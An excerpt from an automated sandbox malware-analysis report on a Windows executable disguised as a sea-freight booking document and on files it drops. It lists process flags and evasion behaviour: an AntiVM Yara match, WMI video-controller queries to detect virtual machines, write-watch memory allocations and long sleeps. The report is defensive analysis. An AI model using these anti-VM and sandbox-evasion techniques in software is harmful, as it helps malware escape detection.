Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 1460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 2FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 4FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 7AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 8C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 1260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 6D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 7D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 7EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 8EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 9200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: A200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: B200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: C4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: D4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: DAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: EAF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 1050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 29A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Memory allocated: 49A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2E70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 3070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 5070000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 7720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 88B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 98B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: ABC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 88B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: ABC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 4A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 1090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 49F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 70B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 80B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: A550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 8240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 9550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: A550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 11C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\XClient.exe	Memory allocated: 4CA0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
